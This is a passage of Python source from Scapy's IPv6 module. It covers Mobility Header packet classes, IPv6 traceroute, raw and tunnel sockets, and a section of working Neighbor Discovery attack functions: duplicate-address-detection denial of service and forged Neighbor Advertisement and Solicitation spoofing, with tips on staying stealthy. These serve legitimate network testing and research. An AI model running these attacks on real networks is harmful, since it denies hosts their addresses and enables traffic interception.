    143: "Forwarding Setup failed (prefixes missing)",
    144: "MIPV6-ID-MISMATCH",
    145: "MIPV6-MESG-ID-REQD",
    146: "MIPV6-AUTH-FAIL",
    147: "Permanent home keygen token unavailable",
    148: "CGA and signature verification failed",
    149: "Permanent home keygen token exists",
    150: "Non-null home nonce index expected",
}
3197
3198
class _MobilityHeader(Packet):
    """Common base of the Mobility Header messages.

    Provides the build-time computation of the ``len`` and ``cksum``
    fields shared by all the messages.
    """

    name = 'Dummy IPv6 Mobility Header'
    overload_fields = {IPv6: {"nh": 135}}

    def post_build(self, p, pay):
        """Fill in the length and checksum of the built message.

        :param p: the built bytes of this layer
        :param pay: the built bytes of the payload
        :returns: layer and payload bytes, with byte 1 set to the header
            length and bytes 4-5 set to the checksum
        """
        data = p + pay

        # Length is expressed in 8-byte units, not counting the first 8
        # bytes. It is only computed when the user did not provide it.
        hdr_len = self.len
        if hdr_len is None:
            hdr_len = (len(data) - 8) // 8
        data = data[:1] + struct.pack("B", hdr_len) + data[2:]

        # The checksum is computed over the message with its final length
        # byte, unless the user provided a value.
        cksum = self.cksum
        if cksum is None:
            cksum = in6_chksum(135, self.underlayer, data)

        return data[:4] + struct.pack("!H", cksum) + data[6:]
3215
3216
class MIP6MH_Generic(_MobilityHeader):
    """Generic Mobility Header message, mainly for decoding unknown ones.

    Everything following the 6 fixed bytes (``nh``, ``len``, ``mhtype``,
    ``res`` and the 2-byte ``cksum``) is kept as an opaque ``msg`` string.
    """

    name = "IPv6 Mobility Header - Generic Message"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        ByteField("len", None),
        ByteEnumField("mhtype", None, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        # The whole header is 8 * (len + 1) bytes long (see
        # _MobilityHeader.post_build()) and 6 of them are the fixed fields
        # above, which leaves 8 * len + 2 bytes for msg. The previous
        # formula (8 * len - 6) was negative for the minimal header
        # (len == 0) and too short by 8 bytes otherwise.
        StrLenField("msg", b"\x00" * 2,
                    length_from=lambda pkt: 8 * pkt.len + 2),
    ]
3226
3227
class MIP6MH_BRR(_MobilityHeader):
    """Mobility Header message of type 0: Binding Refresh Request."""

    name = "IPv6 Mobility Header - Binding Refresh Request"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        ByteField("len", None),
        ByteEnumField("mhtype", 0, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        ShortField("res2", None),
        # autopad activated by default
        _PhantomAutoPadField("autopad", 1),
        # The options follow the first 8 bytes of the message
        _OptionsField("options", [], MIP6OptUnknown, 8,
                      length_from=lambda mh: 8 * mh.len),
    ]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):
        """Return the constant hash shared by BRR, BU and BA messages.

        Hack: the three message types return the very same value because
        a BA must be matched with a BU, and a BU with a BRR. --arno
        """
        return b"\x00\x08\x09"
3246
3247
class MIP6MH_HoTI(_MobilityHeader):
    """Mobility Header message of type 1: Home Test Init."""

    name = "IPv6 Mobility Header - Home Test Init"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        ByteField("len", None),
        ByteEnumField("mhtype", 1, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        StrFixedLenField("reserved", b"\x00" * 2, 2),
        StrFixedLenField("cookie", b"\x00" * 8, 8),
        # autopad activated by default
        _PhantomAutoPadField("autopad", 1),
        # The options follow the first 16 bytes of the message
        _OptionsField("options", [], MIP6OptUnknown, 16,
                      length_from=lambda mh: 8 * (mh.len - 1)),
    ]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):
        """Return the cookie (as bytes), used to pair a test with its init."""
        return bytes_encode(self.cookie)
3264
3265
class MIP6MH_CoTI(MIP6MH_HoTI):
    """Mobility Header message of type 2: Care-of Test Init.

    Same layout as the Home Test Init message; only the default ``mhtype``
    differs.
    """

    name = "IPv6 Mobility Header - Care-of Test Init"
    mhtype = 2

    def hashret(self):
        """Return the cookie (as bytes), used to pair a test with its init."""
        return bytes_encode(self.cookie)
3272
3273
class MIP6MH_HoT(_MobilityHeader):
    """Mobility Header message of type 3: Home Test."""

    name = "IPv6 Mobility Header - Home Test"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        ByteField("len", None),
        ByteEnumField("mhtype", 3, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        ShortField("index", None),
        StrFixedLenField("cookie", b"\x00" * 8, 8),
        StrFixedLenField("token", b"\x00" * 8, 8),
        # autopad activated by default
        _PhantomAutoPadField("autopad", 1),
        # The options follow the first 24 bytes of the message
        _OptionsField("options", [], MIP6OptUnknown, 24,
                      length_from=lambda mh: 8 * (mh.len - 2)),
    ]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):
        """Return the cookie (as bytes), used to pair a test with its init."""
        return bytes_encode(self.cookie)

    def answers(self, other):
        """Return 1 if ``other`` is a Home Test Init with our cookie, else 0."""
        if not isinstance(other, MIP6MH_HoTI):
            return 0
        return 1 if self.cookie == other.cookie else 0
3297
3298
class MIP6MH_CoT(MIP6MH_HoT):
    """Mobility Header message of type 4: Care-of Test.

    Same layout as the Home Test message; only the default ``mhtype``
    differs.
    """

    name = "IPv6 Mobility Header - Care-of Test"
    mhtype = 4

    def hashret(self):
        """Return the cookie (as bytes), used to pair a test with its init."""
        return bytes_encode(self.cookie)

    def answers(self, other):
        """Return 1 if ``other`` is a Care-of Test Init with our cookie, else 0."""
        if not isinstance(other, MIP6MH_CoTI):
            return 0
        return 1 if self.cookie == other.cookie else 0
3311
3312
class LifetimeField(ShortField):
    """16-bit lifetime expressed in units of 4 seconds."""

    def i2repr(self, pkt, x):
        """Return the lifetime ``x`` converted to seconds, as a string."""
        seconds = 4 * x
        return "%d sec" % seconds
3316
3317
class MIP6MH_BU(_MobilityHeader):
    """Mobility Header message of type 5: Binding Update."""

    name = "IPv6 Mobility Header - Binding Update"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        # unit == 8 bytes (excluding the first 8 bytes)
        ByteField("len", None),
        ByteEnumField("mhtype", 5, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        XShortField("seq", None),  # TODO: ShortNonceField
        FlagsField("flags", "KHA", 7, "PRMKLHA"),
        XBitField("reserved", 0, 9),
        LifetimeField("mhtime", 3),  # unit == 4 seconds
        # autopad activated by default
        _PhantomAutoPadField("autopad", 1),
        # The options follow the first 12 bytes of the message
        _OptionsField("options", [], MIP6OptUnknown, 12,
                      length_from=lambda mh: 8 * mh.len - 4),
    ]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):
        """Return the constant hash shared by BRR, BU and BA messages.

        Hack: see comment in MIP6MH_BRR.hashret()
        """
        return b"\x00\x08\x09"

    def answers(self, other):
        """Return 1 if ``other`` is a Binding Refresh Request, else 0."""
        return 1 if isinstance(other, MIP6MH_BRR) else 0
3341
3342
class MIP6MH_BA(_MobilityHeader):
    """Mobility Header message of type 6: Binding Acknowledgement."""

    name = "IPv6 Mobility Header - Binding ACK"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        # unit == 8 bytes (excluding the first 8 bytes)
        ByteField("len", None),
        ByteEnumField("mhtype", 6, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        ByteEnumField("status", 0, bastatus),
        FlagsField("flags", "K", 3, "PRK"),
        XBitField("res2", None, 5),
        XShortField("seq", None),  # TODO: ShortNonceField
        XShortField("mhtime", 0),  # unit == 4 seconds
        # autopad activated by default
        _PhantomAutoPadField("autopad", 1),
        # The options follow the first 12 bytes of the message
        _OptionsField("options", [], MIP6OptUnknown, 12,
                      length_from=lambda pkt: 8 * pkt.len - 4),
    ]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):
        """Return the constant hash shared by BRR, BU and BA messages.

        Hack: see comment in MIP6MH_BRR.hashret()
        """
        return b"\x00\x08\x09"

    def answers(self, other):
        """Tell whether this Binding Ack answers the Binding Update ``other``.

        :param other: the candidate stimulus
        :returns: 1 when ``other`` is a Binding Update that requested an
            acknowledgement and carries the same sequence number, else 0
        """
        # Flag names of the Binding Update are declared as "PRMKLHA" and
        # FlagsField maps the i-th name to bit i: 'A' (Acknowledge) is
        # therefore bit 6. The mask previously used here (0x1) tested the
        # 'P' flag instead, so a regular BU with 'A' set never matched.
        ack_requested = 0x40

        if (isinstance(other, MIP6MH_BU) and
                other.mhtype == 5 and
                self.mhtype == 6 and
                other.flags & ack_requested and
                self.seq == other.seq):
            return 1
        return 0
3371
3372
3373_bestatus = {1: 'Unknown binding for Home Address destination option',
3374 2: 'Unrecognized MH Type value'}
3375
3376# TODO: match Binding Error to its stimulus
3377
3378
class MIP6MH_BE(_MobilityHeader):
    """Mobility Header message of type 7: Binding Error."""

    name = "IPv6 Mobility Header - Binding Error"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        # unit == 8 bytes (excluding the first 8 bytes)
        ByteField("len", None),
        ByteEnumField("mhtype", 7, mhtypes),
        ByteField("res", 0),
        XShortField("cksum", None),
        ByteEnumField("status", 0, _bestatus),
        ByteField("reserved", 0),
        IP6Field("ha", "::"),
        # The options follow the first 24 bytes of the message
        _OptionsField("options", [], MIP6OptUnknown, 24,
                      length_from=lambda mh: 8 * (mh.len - 2)),
    ]
    overload_fields = {IPv6: {"nh": 135}}
3392
3393
# Mobility Header type value -> class implementing the message
_mip6_mhtype2cls = {
    0: MIP6MH_BRR,
    1: MIP6MH_HoTI,
    2: MIP6MH_CoTI,
    3: MIP6MH_HoT,
    4: MIP6MH_CoT,
    5: MIP6MH_BU,
    6: MIP6MH_BA,
    7: MIP6MH_BE,
}
3402
3403
3404#############################################################################
3405#############################################################################
3406# Traceroute6 #
3407#############################################################################
3408#############################################################################
3409
class AS_resolver6(AS_resolver_riswhois):
    """RIS whois AS resolver with support for 6to4 and Teredo addresses."""

    def _resolve_one(self, ip):
        """
        Resolve the AS of the IPv6 address ``ip``.

        For 6to4 and Teredo addresses, the lookup is performed on the IPv4
        address embedded in ``ip``; any other address is looked up as is.

        Returns an ``(ip, asn, desc)`` tuple where ``ip`` is always the
        address received as argument. An ``asn`` of the form "AS<digits>"
        is converted to the matching integer.
        """

        if in6_isaddr6to4(ip):
            # 6to4: the IPv4 address is stored in bytes 2 to 5
            packed = inet_pton(socket.AF_INET6, ip)
            lookup = inet_ntop(socket.AF_INET, packed[2:6])
        elif in6_isaddrTeredo(ip):
            # Teredo: use the mapped address
            lookup = teredoAddrExtractInfo(ip)[2]
        else:
            lookup = ip

        _, asn, desc = AS_resolver_riswhois._resolve_one(self, lookup)

        if asn.startswith("AS"):
            number = asn[len("AS"):]
            try:
                asn = int(number)
            except ValueError:
                # Not a plain number: keep the string version
                pass

        return ip, asn, desc
3435
3436
class TracerouteResult6(TracerouteResult):
    """IPv6 flavour of TracerouteResult, as returned by traceroute6()."""

    __slots__ = []

    def show(self):
        """Build a table of the results via make_table() and return its result.

        Each (sent, received) couple provides: the destination and probe
        type of the sent packet, the hop limit of the sent packet and the
        source and type of the received packet.
        """
        # TODO: ICMPv6 !
        snd_fmt = ("%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}"
                   "{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}")
        rcv_fmt = ("%-42s,IPv6.src% {TCP:%TCP.flags%}"
                   "{ICMPv6DestUnreach:%ir,type%}"
                   "{ICMPv6PacketTooBig:%ir,type%}"
                   "{ICMPv6TimeExceeded:%ir,type%}"
                   "{ICMPv6ParamProblem:%ir,type%}"
                   "{ICMPv6EchoReply:%ir,type%}")

        return self.make_table(
            lambda s, r: (s.sprintf(snd_fmt), s.hlim, r.sprintf(rcv_fmt))
        )

    def get_trace(self):
        """Return the hops of each traced destination.

        :returns: a dict mapping each destination address to a dict
            ``{hlim: (responder source address, reached)}``. ``reached``
            is False when the answer is one of the ICMPv6 error messages
            tested below. Hops located after the first "reached" one are
            removed.
        """
        error_types = (ICMPv6TimeExceeded, ICMPv6DestUnreach,
                       ICMPv6PacketTooBig, ICMPv6ParamProblem)
        trace = {}

        for snd, rcv in self.res:
            if IPv6 not in snd:
                continue
            hops = trace.setdefault(snd[IPv6].dst, {})
            reached = not any(err in rcv for err in error_types)
            hops[snd[IPv6].hlim] = rcv[IPv6].src, reached

        for hops in trace.values():
            reached_hlims = [hlim for hlim, (_, ok) in hops.items() if ok]
            if not reached_hlims:
                # Destination never reached: keep all the hops
                continue
            first_reached = min(reached_hlims)
            for hlim in list(hops):  # use list(): hops is modified below
                if hlim > first_reached:
                    del hops[hlim]

        return trace

    def graph(self, ASres=AS_resolver6(), **kargs):
        """Call TracerouteResult.graph() with an IPv6-aware AS resolver.

        :param ASres: the AS resolver to use (an AS_resolver6 instance by
            default)
        :param kargs: passed as is to TracerouteResult.graph()
        :returns: whatever TracerouteResult.graph() returns. The value was
            previously dropped, so callers always received None.
        """
        return TracerouteResult.graph(self, ASres=ASres, **kargs)
3478
3479
@conf.commands.register
def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(),
                l4=None, timeout=2, verbose=None, **kargs):
    """Instant TCP traceroute using IPv6
    traceroute6(target, [maxttl=30], [dport=80], [sport=80])
        -> (TracerouteResult6, unanswered)

    One probe is sent per hop limit value between minttl and maxttl. The
    probes are TCP segments to dport, unless another layer 4 is provided
    via l4. Remaining keyword arguments are passed to sr(). The results
    are displayed when verbose is set (conf.verb is used when None).
    """
    if verbose is None:
        verbose = conf.verb

    probe = IPv6(dst=target, hlim=(minttl, maxttl))

    if l4 is not None:
        answered, unanswered = sr(probe / l4, timeout=timeout,
                                  verbose=verbose, **kargs)
    else:
        probe = probe / TCP(seq=RandInt(), sport=sport, dport=dport)
        answered, unanswered = sr(probe, timeout=timeout,
                                  filter="icmp6 or tcp", verbose=verbose,
                                  **kargs)

    result = TracerouteResult6(answered.res)

    if verbose:
        result.show()

    return result, unanswered
3502
3503#############################################################################
3504#############################################################################
3505# Sockets #
3506#############################################################################
3507#############################################################################
3508
3509
if not WINDOWS:
    from scapy.supersocket import L3RawSocket

    class L3RawSocket6(L3RawSocket):
        """IPv6 version of L3RawSocket.

        ``outs`` is a raw AF_INET6 socket and ``ins`` a raw AF_PACKET
        socket created for the ``type`` protocol. The ``filter``,
        ``promisc`` and ``nofilter`` arguments are accepted but not used
        by this constructor.
        """

        def __init__(self, type=ETH_P_IPV6, filter=None, iface=None,
                     promisc=None, nofilter=0):
            # NOTE: if fragmentation is needed, it will be done by the
            # kernel (RFC 2292)
            raw = socket.SOCK_RAW
            self.outs = socket.socket(socket.AF_INET6, raw,
                                      socket.IPPROTO_RAW)
            self.ins = socket.socket(socket.AF_PACKET, raw,
                                     socket.htons(type))
            self.iface = iface
3519
3520
def IPv6inIP(dst='203.178.135.36', src=None):
    """Configure the _IPv6inIP socket class and return it.

    The IPv4 tunnel endpoints (dst and src) are stored on the _IPv6inIP
    class. When conf.L3socket is not already _IPv6inIP, it is recorded as
    the class of the underlying worker socket; otherwise conf.L3socket is
    deleted.
    """
    _IPv6inIP.dst = dst
    _IPv6inIP.src = src

    if conf.L3socket == _IPv6inIP:
        del conf.L3socket
    else:
        _IPv6inIP.cls = conf.L3socket

    return _IPv6inIP
3529
3530
class _IPv6inIP(SuperSocket):
    """Socket sending and receiving IPv6 packets encapsulated in IPv4.

    The real work is delegated to a ``worker`` socket, an instance of the
    class stored in ``cls``. ``dst`` and ``src`` are the IPv4 addresses
    used for the encapsulation.
    """

    dst = '127.0.0.1'
    src = None
    cls = None

    def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM,
                 proto=0, **args):
        SuperSocket.__init__(self, family, type, proto)
        # Remaining arguments are for the underlying socket
        self.worker = self.cls(**args)

    def set(self, dst, src=None):
        """Change the IPv4 endpoints (stored at class level)."""
        _IPv6inIP.src = src
        _IPv6inIP.dst = dst

    def nonblock_recv(self):
        """Non-blocking receive on the worker, with decapsulation."""
        received = self.worker.nonblock_recv()
        return self._recv(received)

    def recv(self, x):
        """Receive on the worker, with decapsulation."""
        received = self.worker.recv(x)
        return self._recv(received, x)

    def _recv(self, p, x=MTU):
        """Return the IPv6 payload of ``p`` when it is a tunneled packet.

        ``p`` is decapsulated only if it is an IP packet coming from
        ``dst``, announcing IPv6 as protocol and carrying an IPv6 payload.
        In all other cases (None included), ``p`` is returned unchanged.
        """
        # TODO: verify checksum
        if (p is not None and
                isinstance(p, IP) and
                p.src == self.dst and
                p.proto == socket.IPPROTO_IPV6 and
                isinstance(p.payload, IPv6)):
            return p.payload
        return p

    def send(self, x):
        """Send ``x`` through the worker, encapsulated in an IP packet."""
        tunnel = IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6)
        return self.worker.send(tunnel / x)
3564
3565
3566#############################################################################
3567#############################################################################
3568# Neighbor Discovery Protocol Attacks #
3569#############################################################################
3570#############################################################################
3571
def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None,
                        tgt_filter=None, reply_mac=None):
    """
    Internal generic helper accepting a specific callback as first argument,
    for NS or NA reply. See the two specific functions below.

    reply_callback: called as reply_callback(req, reply_mac, iface) for
           each sniffed packet accepted as a DAD Neighbor Solicitation.

    iface: the interface to sniff on (conf.iface when not provided).

    mac_src_filter: when set, only NS received from that source mac
           address are considered.

    tgt_filter: when set, only NS for that target IPv6 address are
           considered. The address can be provided in printable form
           (e.g. "2001:db8::1") or as its 16-byte packed form. An invalid
           printable address makes inet_pton() fail before sniffing starts.

    reply_mac: the mac address handed to the callback (the one of the
           interface when not provided). Packets sent from that address
           are excluded from the capture.
    """

    def is_request(req, mac_src_filter, tgt_filter):
        """
        Check if packet req is a request. tgt_filter is expected in
        packed form.
        """

        # Those simple checks are based on Section 5.4.2 of RFC 4862
        if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
            return 0

        # Get and compare the MAC address
        mac_src = req[Ether].src
        if mac_src_filter and mac_src != mac_src_filter:
            return 0

        # Source must be the unspecified address
        if req[IPv6].src != "::":
            return 0

        # Check destination is the link-local solicited-node multicast
        # address associated with target address in received NS
        tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
        if tgt_filter and tgt != tgt_filter:
            return 0
        received_snma = inet_pton(socket.AF_INET6, req[IPv6].dst)
        expected_snma = in6_getnsma(tgt)
        if received_snma != expected_snma:
            return 0

        return 1

    # The target of each NS is compared in packed form: convert the filter
    # once, here. It was previously compared as provided, so that a filter
    # given in printable form never matched and all packets were dropped.
    # A 16-byte bytes value is considered already packed.
    if tgt_filter and not (isinstance(tgt_filter, bytes) and
                           len(tgt_filter) == 16):
        tgt_filter = inet_pton(socket.AF_INET6, tgt_filter)

    if not iface:
        iface = conf.iface

    # To prevent sniffing our own traffic
    if not reply_mac:
        reply_mac = get_if_hwaddr(iface)
    sniff_filter = "icmp6 and not ether src %s" % reply_mac

    sniff(store=0,
          filter=sniff_filter,
          lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
          prn=lambda x: reply_callback(x, reply_mac, iface),
          iface=iface)
3622
3623
def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None,
                              reply_mac=None):
    """
    Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
    3756. Incoming NS messages sent from the unspecified address are
    listened for, and each of them is answered with a NS for the same
    target address. The peer is then led to believe that another node is
    also performing DAD for that address.

    The fake NS is built the following way:
     - target address: the target address found in the received NS.
     - IPv6 source address: the unspecified address (::).
     - IPv6 destination address: the destination address of the received
       NS, i.e. the link-local solicited-node multicast address derived
       from the target address.
     - source mac address: the one of the interface (or reply_mac, see
       below).
     - destination mac address: left to Scapy, i.e. the multicast mac
       address derived from the IPv6 destination address.

    The behavior can be tuned using the following arguments:

    iface: the interface (e.g. "eth0") on which the DoS is launched.
           conf.iface is used when None is provided.

    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69"). When set,
           only the NS messages received from that source trigger a
           reply, which limits the effects of the DoS to a single
           victim. The default (None) does not limit the DoS to a
           specific mac address.

    tgt_filter: same idea, but for the target IPv6 address found in the
           received NS (not the IPv6 destination address of the packet):
           a fake reply is sent only when it matches, i.e. the emitter
           becomes a target of the DoS.

    reply_mac: a specific source mac address for the replies, to be used
           instead of the mac address of the interface.
    """

    def ns_reply_callback(req, reply_mac, iface):
        """
        Callback answering a NS with a similar NS
        """

        sender_mac = req[Ether].src
        target = req[ICMPv6ND_NS].tgt

        # Same destination and target as in the request, but sent from the
        # unspecified address, as a node performing DAD would do
        ether = Ether(src=reply_mac)
        ip6 = IPv6(src="::", dst=req[IPv6].dst)
        sendp(ether / ip6 / ICMPv6ND_NS(tgt=target), iface=iface, verbose=0)

        print("Reply NS for target address %s (received from %s)" %
              (target, sender_mac))

    _NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter,
                        tgt_filter, reply_mac)
3678
3679
def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None,
                              reply_mac=None):
    """
    Perform the DAD DoS attack using NA described in section 4.1.3 of RFC
    3756. Incoming NS messages *sent from the unspecified address* are
    listened for, and each of them is answered with a NA for the target
    address. The peer is then led to believe that the address is already
    in use by another node.

    The fake NA is built the following way:
     - target address: the target address found in the received NS.
     - IPv6 source address: the target address found in the received NS.
     - IPv6 destination address: the destination address of the received
       NS, i.e. the link-local solicited-node multicast address derived
       from the target address.
     - source mac address: the one of the interface (or reply_mac, see
       below).
     - destination mac address: left to Scapy, i.e. the multicast mac
       address derived from the IPv6 destination address.
     - a Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled
       with the mac address used as source of the NA.

    The behavior can be tuned using the following arguments:

    iface: the interface (e.g. "eth0") on which the DoS is launched.
           conf.iface is used when None is provided.

    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69"). When set,
           only the NS messages received from that source trigger a
           reply, which limits the effects of the DoS to a single
           victim. The default (None) does not limit the DoS to a
           specific mac address.

    tgt_filter: same idea, but for the target IPv6 address found in the
           received NS (not the IPv6 destination address of the packet):
           a fake reply is sent only when it matches, i.e. the emitter
           becomes a target of the DoS.

    reply_mac: a specific source mac address for the replies, to be used
           instead of the mac address of the interface. That address is
           also the one put in the Target Link-Layer Address option.
    """

    def na_reply_callback(req, reply_mac, iface):
        """
        Callback answering a NS with a NA
        """

        sender_mac = req[Ether].src
        target = req[ICMPv6ND_NS].tgt

        # The NA claims the target address: it is sent from it, with the
        # Override flag set
        rep = (Ether(src=reply_mac) /
               IPv6(src=target, dst=req[IPv6].dst) /
               ICMPv6ND_NA(tgt=target, S=0, R=0, O=1) /  # noqa: E741
               ICMPv6NDOptDstLLAddr(lladdr=reply_mac))
        sendp(rep, iface=iface, verbose=0)

        print("Reply NA for target address %s (received from %s)" %
              (target, sender_mac))

    _NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter,
                        tgt_filter, reply_mac)
3739
3740
def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None,
                           reply_mac=None, router=False):
    """
    The main purpose of this function is to send fake Neighbor Advertisement
    messages to a victim. As the emission of unsolicited Neighbor Advertisement
    is pretty pointless (from an attacker standpoint) because it will not
    lead to a modification of a victim's neighbor cache, the function sends
    advertisements in response to received NS (NS sent as part of the DAD,
    i.e. with an unspecified address as source, are not considered).

    By default, the fake NA sent to create the DoS uses:
     - as target address the target address found in received NS.
     - as IPv6 source address: the target address
     - as IPv6 destination address: the source IPv6 address of received NS
       message.
     - the mac address of the interface as source (or reply_mac, see below).
     - the source mac address of the received NS as destination mac address
       of the emitted NA.
     - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr)
       filled with the mac address used as source of the NA.

    Following arguments can be used to change the behavior:

    iface: a specific interface (e.g. "eth0") of the system on which the
          DoS should be launched. If None is provided conf.iface is used.

    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
         Only NS messages received from this source will trigger replies.
         This allows limiting the effects of the DoS to a single target by
         filtering on its mac address. The default value is None: the DoS
         is not limited to a specific mac address.

    tgt_filter: Same as previous but for a specific target IPv6 address for
         received NS. If the target address in the NS message (not the IPv6
         destination address) matches that address, then a fake reply will
         be sent, i.e. the emitter will be a target of the DoS. The address
         can be provided in printable form (e.g. "2001:db8::1") or as its
         16-byte packed form. An invalid printable address makes
         inet_pton() fail before sniffing starts.

    reply_mac: allow specifying a specific source mac address for the reply,
         i.e. to prevent the use of the mac address of the interface. This
         address will also be used in the Target Link-Layer Address option.

    router: by default (False) the 'R' flag in the NA used for the reply
         is not set. If the parameter is set to True, the 'R' flag in the
         NA is set, advertising us as a router.

    Please, keep the following in mind when using the function: for obvious
    reasons (kernel space vs. Python speed), when the target of the address
    resolution is on the link, the sender of the NS receives 2 NA messages
    in a row, the valid one and our fake one. The second one will overwrite
    the information provided by the first one, i.e. the natural latency of
    Scapy helps here.

    In practice, on a common Ethernet link, the emission of the NA from the
    genuine target (kernel stack) usually occurs in the same millisecond as
    the receipt of the NS. The NA generated by Scapy6 will usually come after
    something 20+ ms. On a usual testbed for instance, this difference is
    sufficient to have the first data packet sent from the victim to the
    destination before it even receives our fake NA.
    """

    def is_request(req, mac_src_filter, tgt_filter):
        """
        Check if packet req is a request. tgt_filter is expected in
        packed form.
        """

        # Those simple checks are based on Section 5.4.2 of RFC 4862
        if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
            return 0

        mac_src = req[Ether].src
        if mac_src_filter and mac_src != mac_src_filter:
            return 0

        # Source must NOT be the unspecified address
        if req[IPv6].src == "::":
            return 0

        tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
        if tgt_filter and tgt != tgt_filter:
            return 0

        dst = req[IPv6].dst
        if in6_isllsnmaddr(dst):  # Address is Link Layer Solicited Node mcast.

            # If this is a real address resolution NS, then the destination
            # address of the packet is the link-local solicited node multicast
            # address associated with the target of the NS.
            # Otherwise, the NS is a NUD related one, i.e. the peer is
            # unicasting the NS to check the target is still alive (L2
            # information is still in its cache and it is verified)
            received_snma = inet_pton(socket.AF_INET6, dst)
            expected_snma = in6_getnsma(tgt)
            if received_snma != expected_snma:
                print("solicited node multicast @ does not match target @!")
                return 0

        return 1

    def reply_callback(req, reply_mac, router, iface):
        """
        Callback that reply to a NS with a spoofed NA
        """

        # Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and
        # send it back.
        mac = req[Ether].src
        src = req[IPv6].src
        tgt = req[ICMPv6ND_NS].tgt
        rep = Ether(src=reply_mac, dst=mac) / IPv6(src=tgt, dst=src)
        # Use the target field from the NS
        rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1)  # noqa: E741

        # "If the solicitation IP Destination Address is not a multicast
        # address, the Target Link-Layer Address option MAY be omitted"
        # Given our purpose, we always include it.
        rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)

        sendp(rep, iface=iface, verbose=0)

        print("Reply NA for target address %s (received from %s)" % (tgt, mac))

    # The target of each NS is compared in packed form: convert the filter
    # once, here. It was previously compared as provided, so that a filter
    # given in printable form never matched and all packets were dropped.
    # A 16-byte bytes value is considered already packed.
    if tgt_filter and not (isinstance(tgt_filter, bytes) and
                           len(tgt_filter) == 16):
        tgt_filter = inet_pton(socket.AF_INET6, tgt_filter)

    if not iface:
        iface = conf.iface
    # To prevent sniffing our own traffic
    if not reply_mac:
        reply_mac = get_if_hwaddr(iface)
    sniff_filter = "icmp6 and not ether src %s" % reply_mac

    router = 1 if router else 0  # Value of the R flags in NA

    sniff(store=0,
          filter=sniff_filter,
          lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
          prn=lambda x: reply_callback(x, reply_mac, router, iface),
          iface=iface)
3877
3878
def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1",
                           dst=None, src_mac=None, dst_mac=None, loop=True,
                           inter=1, iface=None):
    """
    Send forged Neighbor Solicitation (NS) messages to a victim so that it
    creates a new entry in its neighbor cache, or updates an existing one.
    Section 7.2.3 of RFC 4861 states that a node SHOULD create or update the
    entry (unless it is currently performing DAD for the target of the NS),
    the reachability state of the entry being set to STALE.

    The two parameters that matter most are the source link-layer address
    (carried in the Source Link-Layer Address option of the NS) and the IPv6
    source address of the packet.

    Contrary to some other NDP_Attack_* functions, this one does not follow
    a stimulus/response model: it simply emits the same NS packet, by
    default in a loop with one packet per second.

    The packet can be tuned with the following arguments:

    src_lladdr: MAC address placed in the Source Link-Layer Address option
                of the NS. The peer is expected to bind it, in its neighbor
                cache, to the IPv6 source address of the packet. When None,
                the MAC address of the interface is used.

    src: IPv6 source address of the packet. When None, it is left unset and
         an address of the emitting interface is selected (based on the
         destination address of the packet).

    target: target address of the NS; a dummy address (2001:db8::1) is used
            by default. Unless 'dst' is given, the destination address of
            the packet is the solicited-node multicast address derived from
            this target. Consider providing an explicit destination if the
            target differs from the address of the victim.

    dst: IPv6 destination address of the NS. When not provided, the
         solicited-node multicast address associated with the target (see
         above) is used. The victim is not expected to check the destination
         address, so a multicast address such as ff02::1 should work to
         reach every host on the link. To be stealthier, provide the address
         of the victim so that the packet is sent only to it.

    src_mac: Ethernet source address of the frame; the address of the
             interface by default. Another value can be used to be
             stealthier. Note that this is not the address the victim will
             use to populate its neighbor cache.

    dst_mac: Ethernet destination address of the frame. When not provided,
             it is computed for multicast IPv6 destinations (all-nodes,
             solicited-node, ...) and resolved through a neighbor
             solicitation for unicast ones. Provide it explicitly to keep
             the attack stealthy.

    loop: True (the default) to keep sending the NS every 'inter' seconds;
          False to send a single packet.

    inter: delay in seconds between two NS packets when 'loop' is True.

    iface: interface used for sending; conf.iface when not provided.
    """

    iface = iface or conf.iface

    # The Source Link-Layer Address option carries the provided MAC address,
